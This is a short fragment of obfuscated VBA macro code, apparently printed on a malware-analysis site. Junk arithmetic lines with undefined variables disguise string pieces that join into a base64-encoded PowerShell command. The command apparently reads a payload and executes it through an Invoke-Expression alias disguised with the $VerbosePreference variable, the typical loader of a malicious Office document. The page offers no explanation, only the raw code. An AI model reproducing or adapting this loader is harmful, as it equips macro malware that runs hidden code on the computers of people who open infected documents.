GGkPA = CSng(15612 * CInt(40267) + 45246 - 29449)
JXSHO = "sACAAWwBUAEU" + "AWAB0AC4AZ" + "QBuAGM" + "AbwBkAEkAbgBnA"
GGNda = 46145 + Log(41980) - qdXdmS / Atn(13875) / OLFqz / LivQNP
luilN = CSng(64663 * CInt(79471) + 48634 - 34346)
wmFhJi = "F0AOgA6AEEAcwBD" + "AGkAaQAgAC" + "kAI" + "AB9ACAAf" + "AAgA" + "EYAbwBy"
jGanO = 59577 + Log(56372) - SHwtJ / Atn(33966) / UTvji / KGXFi
rYkRfz = CSng(20170 * CInt(48101) + 69365 - 48783)
vQODFa = "AEUAQQBjAGgA" + "LQ" + "BPAGIA" + "SgBFAGMAdAB7AC" + "AA" + "JABfA" + "C4Acg" + "BlAEE"
zzSwvH = 31758 + Log(85110) - NMsNup / Atn(68777) / WzCifm / vhqQww
pvVzkP = CSng(27708 * CInt(29611) + 98408 - 13370)
PFOzzPij = "AZABUAE8" + "ARQBuA" + "GQAKAApAH0AI" + "AApACAAfA" + "Ag" + "ACYA" + "KAAg" + "ACgAWwBzAFQ"
zfifW = 45577 + Log(80185) - UCkWQ / Atn(33765) / jANRz / mUXzsw
UbGAv = CSng(41282 * CInt(66725) + 13863 - 14819)
UKaUbZQzQzO = "AcgBJAE4ARw" + "BdACQAVgB" + "lAFIAYgB" + "PAHMAZQBwA" + "FIARQBGAGU"
KSbii = 80579 + Log(8829) - FjYjN / Atn(3350) / HQKKGi / bktsvk
uiFYkD = CSng(97845 * CInt(46988) + 25108 - 14586)
YpPBEwh = "AcgBlAE4AQwBF" + "ACkAWwAxACw" + "AMwBdACsAJwBY" + "ACcALQBKAE8A" + "aQBOACcAJwApA" + "A=="
jjWDFwJwSEi = JXSHO + wmFhJi + vQODFa + PFOzzPij + UKaUbZQzQzO + YpPBEwh
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.